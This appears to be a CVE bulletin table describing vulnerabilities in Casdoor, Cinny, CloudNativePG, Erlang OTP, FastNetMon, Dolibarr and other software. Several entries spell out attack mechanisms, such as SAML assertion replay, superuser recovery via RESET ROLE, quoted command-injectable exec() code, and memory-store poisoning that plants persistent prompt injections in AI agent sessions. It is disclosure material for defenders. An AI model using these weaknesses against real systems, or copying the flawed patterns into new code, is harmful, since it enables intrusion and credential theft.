| Casdoor--Casdoor | In Casdoor versions 2.362.0 and earlier, the SAML service provider implementation does not validate the AudienceRestriction element in SAML assertions. The buildSp function in object/saml_sp.go never sets AudienceURI on the gosaml2 SAMLServiceProvider struct and never inspects WarningInfo.NotInAudience. This allows assertions issued for other service providers to be accepted by Casdoor. | 2026-05-28 | not yet calculated | CVE-2026-9093 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier contain a vulnerability enabling cross-organization token exchange. The GetTokenExchangeToken function in object/token_oauth.go validates JWT signatures but does not verify that the token's user belongs to the same organization as the target application. This can result in privilege escalation across organizational boundaries. | 2026-05-28 | not yet calculated | CVE-2026-9094 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier map SAML assertions to user sessions without replay protection. The ParseSamlResponse() function in object/saml_sp.go calls sp.RetrieveAssertionInfo() and immediately maps the result to a user session. There is no assertion ID cache, OneTimeUse condition enforcement, or replay detection anywhere in the SAML SP code path. As a result, an attacker can replay a previously captured SAML assertion to obtain an authenticated session for the assertion's subject, including administrator accounts, without needing the user's password or MFA credentials. | 2026-05-28 | not yet calculated | CVE-2026-9095 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier do not enforce SAML assertion time bounds. The gosaml2 library reports all time-validation results, including NotOnOrAfter and NotBefore, in the assertionInfo.WarningInfo field. However, ParseSamlResponse() never reads this field, meaning that time bounds are computed by the library but silently discarded before the user session is issued. | 2026-05-28 | not yet calculated | CVE-2026-9096 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | Casdoor versions 2.362.0 and earlier do not verify that a JWT used for token exchange is still active. The GetTokenExchangeToken() function in object/token_oauth.go validates the JWT signature and parses its claims, but never queries the Token table to verify whether the subject token has been revoked or invalidated. Because the revocation check is entirely absent, administrators are unable to terminate active sessions or revoke compromised tokens. | 2026-05-28 | not yet calculated | CVE-2026-9097 | https://kb.cert.org/vuls/id/780781 |
| Casdoor--Casdoor | In Casdoor versions 2.362.0 and earlier, the SAML callback handler in controllers/auth.go accepts any well-formed SAMLResponse sent to /api/acs without verifying that it corresponds to an AuthnRequest previously issued by Casdoor. Additionally, if an administrator disables or deletes an IdP (Identity Provider) after a SAML flow has started, the handler still processes the response using the provider snapshot loaded at the start of the request. As a result, an attacker controlling a registered upstream IdP can send unsolicited SAML responses, or replay a legitimately captured response in a different session or after the original flow has ended. In both cases, Casdoor accepts the response and issues a session, enabling persistent unauthorized access. | 2026-05-28 | not yet calculated | CVE-2026-9098 | https://kb.cert.org/vuls/id/780781 |
| cinnyapp--cinny | Cinny is a Matrix client. Prior to 4.10.3, A remote authenticated attacker who shares a room with a victim and has permissions to create room emotes (for example in a DM) can cause the victim's client to send their Matrix access token to an attacker-controlled server. This occurs when the victim opens the emoji or sticker picker for the room containing a malicious emote pack. This is caused by an incorrect fallback in EmojiBoard that uses untrusted pack.meta.avatar (user-controlled) without converting/validating it as an MXC URL, allowing arbitrary HTTP(S) URLs to be used. Also, the service worker attaching the user's Authorization bearer token to all outbound GET requests whose URL contains /_matrix/client/v1/media/download or /_matrix/client/v1/media/thumbnail without verifying the request host matches the configured homeserver origin. An attacker-controlled URL containing those path fragments and permissive CORS will receive the victim's Authorization header (access token). This vulnerability is fixed in 4.10.3. | 2026-05-27 | not yet calculated | CVE-2026-42553 | https://github.com/cinnyapp/cinny/security/advisories/GHSA-j944-w549-3453 https://github.com/cinnyapp/cinny/releases/tag/v4.10.3 |
| cloudnative-pg--cloudnative-pg | CloudNativePG is a platform designed to manage PostgreSQL databases within Kubernetes environments. Prior to 1.29.1 and 1.28.3, the CloudNativePG metrics exporter opens its PostgreSQL connection as the postgres superuser via the pod-local Unix socket, then demotes the session with SET ROLE pg_monitor. SET ROLE changes only current_user; session_user remains postgres. Any SQL expression evaluated inside the scrape session can invoke RESET ROLE to recover real superuser privileges, then use COPY ... TO PROGRAM to spawn an OS-level subprocess as the postgres user inside the primary pod. The READ ONLY transaction flag does not block this; it gates writes to database state, not external processes. This vulnerability is fixed in 1.29.1 and 1.28.3. | 2026-05-28 | not yet calculated | CVE-2026-44477 | https://github.com/cloudnative-pg/cloudnative-pg/security/advisories/GHSA-423p-g724-fr39 https://github.com/cloudnative-pg/cloudnative-pg/pull/10576 |
| cnighswonger--claude-code-cache-fix | claude-code-cache-fix is a cache optimization proxy for Claude Code. From 3.5.0 to before 3.5.2, tools/quota-statusline.sh (introduced in v3.5.0) interpolates Claude Code's hook stdin payload directly into a Python triple-quoted string literal. A ''' byte sequence in any user-controlled field of the payload closes the literal early and lets following bytes execute as Python in the user's Claude Code process. This vulnerability is fixed in 3.5.2. | 2026-05-27 | not yet calculated | CVE-2026-45136 | https://github.com/cnighswonger/claude-code-cache-fix/security/advisories/GHSA-g3xq-3gmv-qq8g https://github.com/cnighswonger/claude-code-cache-fix/issues/108 https://github.com/cnighswonger/claude-code-cache-fix/pull/110 |
| CP Plus--Wi-Fi Camera CP-E38Q, CP-E48Q, CP-E25Q, CP-E35Q, CP-E45Q, CP-E28Q, CP-E21Q, CP-E31Q, CP-E41Q, CP-E24Q, CP-Z43Q, CP-E34Q, CP-E44Q, CP-T31Q, CP-V48Q, CP-V41Q, CP-Z45Q | This vulnerability exists in CP Plus Wi-Fi Camera due to improper protection of sensitive information in runtime memory. An attacker with physical access could exploit this vulnerability by accessing the UART interface and performing memory extraction to obtain sensitive information, including cryptographic private keys, Wi-Fi credentials and configuration data stored in RAM of the targeted device. Successful exploitation of this vulnerability could allow unauthorized access to encrypted communications and connected wireless network of the targeted device. | 2026-05-25 | not yet calculated | CVE-2026-9274 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0266 |
| Craft--CMS 5.9.5 | Craft CMS 5.9.5 and earlier contains a Missing Authorization vulnerability in the migrate endpoint (/actions/app/migrate). | 2026-05-27 | not yet calculated | CVE-2026-31266 | https://github.com/craftcms/cms https://github.com/0xrixet/cms-security-poc |
| creatorsofcode--simplephp | A stored cross-site scripting (XSS) vulnerability in the /admin/config-module.php component of creatorsofcode simplephp GitHub commit 5184cff (Latest as of 2026-02-27) via injecting a crafted payload. | 2026-05-27 | not yet calculated | CVE-2026-38931 | http://creatorsofcode.com http://simplephp.com https://moworn.github.io/post/cve-2026-38931/ |
| D-Link Corporation--DWR-X1820 | Dlink DWR-X1820 router uses weak default password generated from its IMEI number and does not require users to change it. An attacker who knows how passwords are generated can easily crack the default password if they have the device IMEI number. This issue was fixed in version 1.00B16CP. | 2026-05-28 | not yet calculated | CVE-2026-4377 | https://cert.pl/posts/2026/05/CVE-2026-4377 https://www.dlink.com/pl/pl/products/dwr-1820-cp#support |
| Dataojitori--nocturne_memory | Nocturne Memory is a lightweight, rollbackable, and visual Long-Term Memory Server for MCP Agents. Prior to 2.4.1, when API_TOKEN is unset or empty, the BearerTokenAuthMiddleware bypasses authentication for all HTTP requests. Combined with the default 0.0.0.0 host binding and CORS allow_origins=["*"], operators following the Docker setup without explicitly setting API_TOKEN expose the full Knowledge-Graph read/write API to any LAN-reachable client. An attacker on the same network can read, write, or delete all memory entries - including system://boot and core://* URIs that auto-load into downstream agent sessions, enabling persistent prompt-injection. This vulnerability is fixed in 2.4.1. | 2026-05-27 | not yet calculated | CVE-2026-44830 | https://github.com/Dataojitori/nocturne_memory/security/advisories/GHSA-crr4-xrj9-ww8g |
| Dokploy--dokploy | Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.19.0 and earlier, the protectedProcedure middleware only verifies the user is authenticated - it does NOT enforce organization scoping. Each endpoint must individually verify the resource's org matches the session's activeOrganizationId. This affects the following endpoints: allByType, killProcess, and removeDeployment in deployment.ts; delete in rollbacks.ts; create, one, update, remove, manualBackupPostgres, MySql, Mariadb, Mongo, Compose, WebServer, and listBackupFiles in backup.ts; list, one, delete, update, runManually, and restoreVolumeBackupWithLogs in volume-backups.ts; getNodes, removeWorker, addWorker, and addManager in cluster.ts; and create in mount.ts. | 2026-05-29 | not yet calculated | CVE-2026-43917 | https://github.com/Dokploy/dokploy/security/advisories/GHSA-f8wj-5c4w-frhg |
| Dolibarr--ERP/CRM | An issue in Dolibarr ERP/CRM v.22.0.0 through v.22.0.4 and v.24.0.0-alpha allows a remote attacker to execute arbitrary code via the htdocs/core/actions_addupdatedelete.inc.php | 2026-05-27 | not yet calculated | CVE-2026-37711 | https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-grw9-6m4w-mhcq https://bryamzxz.github.io/2026/05/25/dol_eval-five-years/ |
| Dolibarr--ERP/CRM | An issue in Dolibarr ERP/CRM v.22.0.0 through v.22.0.4 and v.24.0.0-alpha allows a remote attacker to execute arbitrary code via the htdocs/cron/class/cronjob.class.php, call_user_func_array() in function job type | 2026-05-27 | not yet calculated | CVE-2026-37712 | https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-c2jp-w9cj-6cx4 https://bryamzxz.github.io/2026/05/25/dol_eval-five-years/ |
| Dolibarr--ERP/CRM | An issue in Dolibarr ERP/CRM v.22.0.0 through v.22.0.4 and v.24.0.0-alpha allows a remote attacker to execute arbitrary code via the htdocs/core/class/commonobject.class.php. | 2026-05-27 | not yet calculated | CVE-2026-37713 | https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-cq92-jp5j-rwvj https://bryamzxz.github.io/2026/05/25/dol_eval-five-years/ |
| dotCMS--dotCMS Core | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in the Publish Audit API endpoints (/api/auditPublishing/get and /api/auditPublishing/getAll) in dotCMS Core 25.11.04-1 through 26.04.28-02 allows remote unauthenticated attackers to read, modify, or destroy arbitrary database content. The endpoints did not enforce authentication and accepted unsanitized input used in dynamically constructed SQL. The fix in dotCMS Core 26.04.28-03 requires an authenticated backend user with the publishing-queue portlet permission. LTS releases are not affected as the vulnerable code path was never backported. | 2026-05-27 | not yet calculated | CVE-2026-8054 | dotCMS Known Security Issues — SI-75 dotCMS/core#35553 — Fix SQL injection in Publish Audit API |
| Drupal--SAML SSO - Service Provider | Improper Check for Unusual or Exceptional Conditions vulnerability in Drupal SAML SSO - Service Provider allows Privilege Escalation. This issue affects SAML SSO - Service Provider: from 0.0.0 before 3.1.4. | 2026-05-28 | not yet calculated | CVE-2026-5343 | https://www.drupal.org/sa-contrib-2026-031 |
| Drupal--TFA Basic Plugins | An access bypass vulnerability in Drupal TFA Basic Plugins allows users with the administer users permission to view or generate recovery codes for other users. This issue affects TFA Basic Plugins: from 7.x-1.0 through 7.x-1.2. | 2026-05-28 | not yet calculated | CVE-2026-6816 | Drupal security advisory SA-CONTRIB-2025-085 https://d7es.tag1.com/security-advisories/tfa-basic-plugins-less-critical-access-bypass-sa-contrib-2025-085 |
| Easyelife--App Lock | Easyelife App lock (aka Fingerprint,Applock or locker.app.safe.applocker) 1.9.2 for Android allows a local attacker with physical access to bypass the PIN lock. The lock is implemented as an overlay rather than by using Android's secure authentication APIs. By navigating cascading interface flows - insecure navigation through exposed routes facilitates app control evasion {I.N.T.E.R.F.A.C.E] via advertisement or browser intents - an attacker can evade lockscreen verification and access protected apps (e.g., Chrome), resulting in information disclosure and privilege escalation. | 2026-05-26 | not yet calculated | CVE-2025-68710 | https://play.google.com/store/apps/details?id=locker.app.safe.applocker https://github.com/actuator/locker.app.safe.applocker https://github.com/actuator/locker.app.safe.applocker/blob/main/CVE-2025-68710 |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In 3.8.8 and earlier, there is persistent local-pty code execution via imported bookmarks or compromised sync targets. Affects users who import bookmark JSON files or who have electerm sync configured (gist/WebDAV). The attacker can inject exec* fields or global config to cause remote code to run when a bookmark is opened or when sync is applied. | 2026-05-28 | not yet calculated | CVE-2026-45058 | https://github.com/electerm/electerm/security/advisories/GHSA-jgg9-rw32-44pj |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. From 3.0.6 to 3.8.8, This vulnerability is fixed in 3.9.0. | 2026-05-28 | not yet calculated | CVE-2026-45353 | https://github.com/electerm/electerm/security/advisories/GHSA-7p5m-v798-f8vv https://github.com/electerm/electerm/commit/0599e67069b00e376a2e962649aaad6096e63507 |
| electerm--electerm | electerm is an open-sourced terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to 3.9.5, deterministic AES-192-CBC with a fixed zero IV, constant KDF salt, and no MAC leads to confidentiality and integrity failures for synced bookmark/profile data. Attackers can crack common passwords across installs and perform undetected ciphertext bit-flips to alter config/bookmarks. This vulnerability is fixed in 3.9.5. | 2026-05-28 | not yet calculated | CVE-2026-45787 | https://github.com/electerm/electerm/security/advisories/GHSA-g29v-q6h7-76wh https://github.com/electerm/electerm/commit/9dd8295e37d53396b980cd45dfc5ed11ad79b937 |
| element-hq--synapse | Synapse is an open source Matrix homeserver implementation. Prior to 1.152.1, in federated rooms, malicious homeservers can craft room events in such a way that prevents Synapse from providing full history to paginating clients. Clients could therefore fail to display room history. This vulnerability is fixed in 1.152.1. | 2026-05-28 | not yet calculated | CVE-2026-45076 | https://github.com/element-hq/synapse/security/advisories/GHSA-6qf2-7x63-mm6v |
| element-hq--synapse | Synapse is an open source Matrix homeserver implementation. Prior to 1.152.1, local authenticated users can cause Synapse to starve other requests of CPU and lead to other requests failing, causing other users to be denied service. This vulnerability is fixed in 1.152.1. | 2026-05-28 | not yet calculated | CVE-2026-45078 | https://github.com/element-hq/synapse/security/advisories/GHSA-8q93-326v-3m7g |
| Emlog--Emlog Pro v2.6.9 | The template upload feature in Emlog Pro v2.6.9 has a path traversal vulnerability, allowing authenticated administrators to execute arbitrary PHP code. By uploading a malicious ZIP archive containing directory traversal sequences in filenames, an attacker can overwrite default template files or directly include malicious code files in the current template. | 2026-05-29 | not yet calculated | CVE-2026-39276 | https://www.emlog.net/ https://github.com/LING12138-sg/Emlog-v2.6.9-Vulnerability-Report |
| Erlang--OTP | Improper Following of a Certificate's Chain of Trust vulnerability in Erlang OTP public_key (pubkey_cert module) allows a non-CA certificate to be accepted as an intermediate issuer, enabling certificate chain forgery. In lib/public_key/src/pubkey_cert.erl, pubkey_cert:validate_extensions/7 contains two flaws that together allow a certificate with basicConstraints cA:false and no keyUsage extension to be used as an intermediate issuer in a chain passed to public_key:pkix_path_validation/3: the cA:false clause recurses into the remaining extensions without rejecting the certificate when it is in issuer position, and the keyUsage check only fires when the extension is present, so a certificate lacking keyUsage entirely bypasses the keyCertSign enforcement. Any party holding an end-entity certificate with basicConstraints cA:false and no keyUsage extension, issued by any CA in the victim's trust store, can use that certificate's private key to sign forged leaf certificates for arbitrary identities. public_key:pkix_path_validation/3 accepts the resulting chain, and by extension every TLS or mTLS endpoint built on the OTP ssl application that relies on the default verifier is affected, including server identity verification on the client side and client certificate verification on mTLS servers. This issue affects OTP from OTP 17.0 before OTP 26.2.5.21, 27.3.4.12, 28.5.0.1, and 29.0.1 corresponding to public_key from 0.22 before 1.15.1.7, 1.17.1.3, 1.20.3.1, and 1.21.1. | 2026-05-27 | not yet calculated | CVE-2026-42789 | https://github.com/erlang/otp/security/advisories/GHSA-c99q-jmpx-v8qq https://cna.erlef.org/cves/CVE-2026-42789.html https://osv.dev/vulnerability/EEF-CVE-2026-42789 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/471cd2f664300a95353c467873800bbe706005db https://github.com/erlang/otp/commit/59c8d824386b2eb1614ff9340624843ef6aca0fd |
| Erlang--OTP | Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_cert and public_key modules) allows a DNS nameConstraints bypass via subject CommonName fallback in TLS hostname verification. Two flaws combine to allow a subordinate CA whose DNS nameConstraints are restricted (e.g. permitted;DNS:allowed.example.com) to issue a leaf certificate that an OTP TLS client accepts as a valid identity for an out-of-scope hostname (e.g. victim.example.com): First, pubkey_cert:validate_names/6 in lib/public_key/src/pubkey_cert.erl only checks SAN DNS entries against nameConstraints. Per RFC 5280, a permitted DNS subtree only restricts certificates that contain a DNS-typed name. A leaf with no subjectAltName therefore trivially satisfies any permitted;DNS:... constraint regardless of its subject commonName. Second, public_key:pkix_verify_hostname/3 in lib/public_key/src/public_key.erl falls back to the subject commonName when no subjectAltName is present, extracting id-at-commonName attributes as presented IDs and matching them against the reference hostname. The strict pkix_verify_hostname_match_fun(https) matcher does not suppress this fallback. The result is that path validation accepts a CN-only leaf under a DNS-constrained intermediate (no SAN means the nameConstraints are not triggered), and hostname verification then accepts it via the CN fallback. The bypass is reachable from stock ssl:connect with verify_peer, a trusted CA, SNI, and the canonical strict https hostname matcher. This issue affects OTP from OTP 19.3 before OTP 26.2.5.21, 27.3.4.12, 28.5.0.1, and 29.0.1 corresponding to public_key from 1.4 before 1.15.1.7, 1.17.1.3, 1.20.3.1, and 1.21.1. | 2026-05-27 | not yet calculated | CVE-2026-42790 | https://github.com/erlang/otp/security/advisories/GHSA-22cw-4ph4-6447 https://cna.erlef.org/cves/CVE-2026-42790.html https://osv.dev/vulnerability/EEF-CVE-2026-42790 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/0769050c69d73762672b0db1347b6993a5b31759 https://github.com/erlang/otp/commit/fb67c6d1836f51105a96d8b769e71e4215a79457 https://github.com/erlang/otp/commit/21abed64eb2026b5f82f432709e4e932f9be389a |
| Erlang--OTP | Improper Certificate Validation vulnerability in Erlang OTP public_key (pubkey_ocsp module) allows forged OCSP responses signed with an expired responder certificate to be accepted as valid. OCSP response verification in pubkey_ocsp:verify_response/5 and pubkey_ocsp:is_authorized_responder/3 in lib/public_key/src/pubkey_ocsp.erl does not check the validity period (notBefore/notAfter) of the OCSP responder certificate. An attacker who has obtained the private key of an expired CA-designated OCSP responder certificate can forge OCSP responses that Erlang/OTP accepts as valid. This affects TLS clients using OCSP stapling via the ssl application: a malicious or compromised server can present a revoked TLS certificate together with a forged OCSP response signed by an expired responder key, and the client will accept the revoked certificate as valid. It also affects applications calling public_key:pkix_ocsp_validate/5 directly, where the impact depends on the use case - server-side client certificate validation using this API may allow authentication bypass with a revoked client certificate. This issue affects OTP from OTP 27.0 before OTP 27.3.4.12, 28.5.0.1, and 29.0.1 corresponding to public_key from 1.16 before 1.17.1.3, 1.20.3.1, and 1.21.1. | 2026-05-27 | not yet calculated | CVE-2026-42791 | https://github.com/erlang/otp/security/advisories/GHSA-cjxj-wj6x-3fff https://cna.erlef.org/cves/CVE-2026-42791.html https://osv.dev/vulnerability/EEF-CVE-2026-42791 https://www.erlang.org/doc/system/versions.html#order-of-versions https://github.com/erlang/otp/commit/7995f1fdaee3da569bb810358ce0f546471d169b https://github.com/erlang/otp/commit/b3870e02405c709a872b01ba6086065620cdfe76 |
| esm-dev--esm.sh | esm.sh is a no-build content delivery network (CDN) for web development. In 137 and earlier, the legacy router first retrieves a response from legacyServer, parses the incoming request path, and ultimately writes the data to storage via buildStorage.Put. The router concatenates the path components without sanitizing them, producing a storage key. When this key is used, the underlying file system resolves the relative segments and writes the file to the specified path. Thus an attacker can craft a request that writes data to arbitrary locations on the server. | 2026-05-28 | not yet calculated | CVE-2026-44593 | https://github.com/esm-dev/esm.sh/security/advisories/GHSA-3636-h3vx-6465 |
| ex-aws--ex_aws_sns | Improper Certificate Validation vulnerability in ex-aws ex_aws_sns (ExAws.SNS, ExAws.SNS.PublicKeyCache modules) allows Signature Spoofing by Improper Validation. This vulnerability is associated with program files lib/ex_aws/sns.ex, lib/ex_aws/sns/public_key_cache.ex and program routines 'Elixir.ExAws.SNS':verify_message/1, 'Elixir.ExAws.SNS.PublicKeyCache':get/1. 'Elixir.ExAws.SNS':verify_message/1 fetches the signing certificate from the SigningCertURL field of the incoming SNS message without validating that the URL uses HTTPS or that the host matches an AWS-owned SNS certificate domain. An unauthenticated attacker who can POST to an endpoint that calls verify_message/1 can supply an attacker-controlled SigningCertURL, sign a forged SNS message with their own key, and cause the function to return :ok, completely bypassing SNS signature verification. This issue affects ex_aws_sns: from 2.0.1 before 2.3.5. | 2026-05-28 | not yet calculated | CVE-2026-47074 | https://github.com/ex-aws/ex_aws_sns/security/advisories/GHSA-8jgf-23q5-x7xx https://cna.erlef.org/cves/CVE-2026-47074.html https://osv.dev/vulnerability/EEF-CVE-2026-47074 https://github.com/ex-aws/ex_aws_sns/commit/1853d280b152d10384a1e21a22cf22152a60be48 |
| Falco Solutions--PHPPageBuilding v0.31.0 | Falco Solutions PHPPageBuilder v0.31.0 contains an unrestricted file upload vulnerability in the pagemanager/pagebuilder module that allows remote attackers to upload arbitrary files and achieve remote code execution. The vulnerability exists due to insufficient validation of uploaded file types and executable content. | 2026-05-29 | not yet calculated | CVE-2026-39292 | https://github.com/HansSchouten/PHPageBuilder https://github.com/krishnadevpmelevila/CVE-2026-39292/tree/main |
| FastNetMon--FastNetMon Communit Edition | FastNetMon Community Edition through 1.2.9 has out-of-bounds memory access because it incorrectly parses BGP path attributes with the extended length flag set. In src/bgp_protocol.hpp, the parse_raw_bgp_attribute() function correctly identifies when extended_length_bit is set and sets length_of_length_field to 2, but then reads only a single byte for the attribute value length (attribute_value_length = value[2] at line 173). Per RFC 4271 Section 4.3, when the Extended Length bit is set, the Attribute Length field is two octets and the value should be read as a 16-bit big-endian integer from value[2] and value[3]. As a result, any attribute longer than 255 bytes has its length silently truncated to the low byte (e.g., 300 bytes = 0x012C is read as 0x2C = 44 bytes). The remaining 256 bytes are then misinterpreted as subsequent attributes, causing cascading parse failures and potential out-of-bounds memory access. | 2026-05-26 | not yet calculated | CVE-2026-48685 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/bgp_protocol.hpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48685-bgp-extended-length |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an out-of-bounds read vulnerability in the NetFlow v9 data flowset processor. In src/netflow_plugin/netflow_v9_collector.cpp, the Data template branch (lines 1695-1702) iterates over flow records without performing a per-iteration bounds check against the packet end pointer. In contrast, the Options template branch (lines 1709-1719) correctly checks 'if (pkt + offset + field_template->total_length > packet_end)' before each iteration. The Data branch omits this check entirely. Since template definitions are sent by the network peer (and are unauthenticated UDP), an attacker can craft templates that cause the parser to read arbitrary memory past the packet buffer. This can leak sensitive memory contents or cause a crash. | 2026-05-26 | not yet calculated | CVE-2026-48683 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/netflow_plugin/netflow_v9_collector.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48683-netflow-v9-data-oob |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an out-of-bounds read in the NetFlow v9 options template parser. In process_netflow_v9_options_template() (src/netflow_plugin/netflow_v9_collector.cpp), the scope parsing loop (lines 224-229) iterates until scopes_offset reaches the attacker-controlled option_scope_length value, reading netflow9_template_flowset_record_t structures at each step. No bounds check validates that (zone_address + scopes_offset + sizeof(record)) stays within the flowset. The same issue affects the options field loop (lines 241-257) with option_length. Furthermore, option_scope_length is not validated to be a multiple of sizeof(netflow9_template_flowset_record_t), potentially causing misaligned reads. An attacker can trigger reads past the end of the UDP packet buffer. | 2026-05-26 | not yet calculated | CVE-2026-48684 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/netflow_plugin/netflow_v9_collector.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48684-netflow-v9-options-oob |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains a stack-based buffer overflow in the BGP NLRI (Network Layer Reachability Information) decoder. The function decode_bgp_subnet_encoding_ipv4_raw() in src/bgp_protocol.cpp reads prefix_bit_length directly from the BGP packet (line 99) without validating it is <= 32 for IPv4 prefixes. This value is passed to how_much_bytes_we_need_for_storing_certain_subnet_mask() which computes ceil(prefix_bit_length / 8), returning up to 32 bytes for a prefix_bit_length of 255. The result is used as the length argument to memcpy() (line 106), which copies into a 4-byte uint32_t stack variable (prefix_ipv4). This causes a stack buffer overflow of up to 28 bytes, which can be exploited for arbitrary code execution. Additionally, the unvalidated prefix_bit_length is passed to convert_cidr_to_binary_netmask_local_function_copy() (line 111), where a shift of (32 - cidr) with cidr > 32 causes undefined behavior. | 2026-05-26 | not yet calculated | CVE-2026-48686 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/bgp_protocol.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48686-bgp-nlri-stack-overflow |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an OS command injection vulnerability in the Juniper router integration plugin. The _log() function in src/juniper_plugin/fastnetmon_juniper.php (lines 117-118) constructs shell commands by concatenating the $msg parameter directly into exec() calls: exec("echo `date` \"- {FASTNETMON] - " . $msg . " \" >> " . $FILE_LOG_TMP). The $msg variable contains unsanitized data derived from command-line arguments argv[1] through argv[3], which represent the attack IP address, direction, and power. While FastNetMon's C++ core currently passes IP addresses via inet_ntoa() (which only produces safe dotted-decimal notation), the PHP script performs no input validation or shell escaping. If the script is invoked directly, by another orchestration system, or if future code changes pass string-sourced IPs, arbitrary commands can be injected. The correct fix is to replace exec() with file_put_contents() or use escapeshellarg() on all parameters. | 2026-05-26 | not yet calculated | CVE-2026-48687 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/juniper_plugin/fastnetmon_juniper.php https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48687-juniper-cmd-injection |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains multiple out-of-bounds reads in the BGP MP_REACH_NLRI IPv6 attribute decoder. The function decode_mp_reach_ipv6() in src/bgp_protocol.cpp contains a TODO comment at line 156 explicitly acknowledging 'we should add sanity checks to avoid reads after attribute memory block.' The function casts raw pointers to structure types without verifying sufficient data exists (line 158), uses the attacker-controlled length_of_next_hop field to determine memcpy size (line 181), and computes prefix_length by dereferencing a pointer calculated from multiple attacker-controlled offsets without bounds validation (line 189). The prefix_length is then used to calculate number_of_bytes_required_for_prefix which becomes a memcpy length (line 202) with no check against remaining buffer size. | 2026-05-26 | not yet calculated | CVE-2026-48688 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/bgp_protocol.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48688-bgp-mp-reach-nlri-ipv6 |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an off-by-one heap-based buffer overflow in the dynamic_binary_buffer_t class (src/dynamic_binary_buffer.hpp). Five methods (append_dynamic_buffer, append_data_as_pointer, append_data_as_object_ptr, memcpy_from_ptr, memcpy_from_object_ptr) use an incorrect bounds check of the form 'if (offset + length > maximum_internal_storage_size + 1)' instead of the correct 'if (offset + length > maximum_internal_storage_size)'. This allows writing exactly one byte past the end of the heap-allocated buffer. The class is used pervasively in BGP message encoding/decoding, NetFlow template processing, and Flow Spec NLRI construction. An attacker who can send network traffic (NetFlow, sFlow, IPFIX, or BGP) to a FastNetMon instance can trigger this overflow, potentially achieving arbitrary code execution by corrupting heap metadata. Notably, the append_byte() method uses the correct bounds check, confirming the inconsistency. | 2026-05-26 | not yet calculated | CVE-2026-48689 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/dynamic_binary_buffer.hpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48689-dynamic-buffer-off-by-one |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an integer overflow vulnerability in the packet capture buffer allocation. In src/packet_storage.hpp, the allocate_buffer() function computes memory_size_in_bytes as 'buffer_size_in_packets * (max_captured_packet_size + sizeof(fastnetmon_pcap_pkthdr_t)) + sizeof(fastnetmon_pcap_file_header_t)' using unsigned int (32-bit) arithmetic. With max_captured_packet_size=1500 and sizeof(fastnetmon_pcap_pkthdr_t)=16, each packet requires approximately 1516 bytes. If buffer_size_in_packets exceeds approximately 2,832,542, the multiplication overflows, resulting in a much smaller allocation than expected. Subsequent write_packet() calls then write past the allocated buffer, causing heap corruption. The buffer_size_in_packets value is derived from the ban_details_records_count configuration parameter, which is parsed using atoi() with no overflow checking. | 2026-05-26 | not yet calculated | CVE-2026-48690 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/packet_storage.hpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48690-packet-storage-integer-overflow |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an integer overflow in the BGP AS_PATH attribute encoder. In src/bgp_protocol.hpp, the IPv4UnicastAnnounce::get_attributes() function computes attribute_length as 'sizeof(bgp_as_path_segment_element_t) + this->as_path_asns.size() * sizeof(uint32_t)' and stores it in a uint8_t field (line 600-605). Since uint8_t can only hold values 0-255, an AS_PATH containing more than 63 ASNs (2 + 64*4 = 258 > 255) causes silent truncation. The truncated length is used for buffer sizing, while the actual data written is the full untruncated amount, resulting in a heap buffer overflow. Similarly, the path_segment_length field at line 621 is also uint8_t, truncating with more than 255 ASNs. | 2026-05-26 | not yet calculated | CVE-2026-48691 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/bgp_protocol.hpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48691-bgp-as-path-overflow |
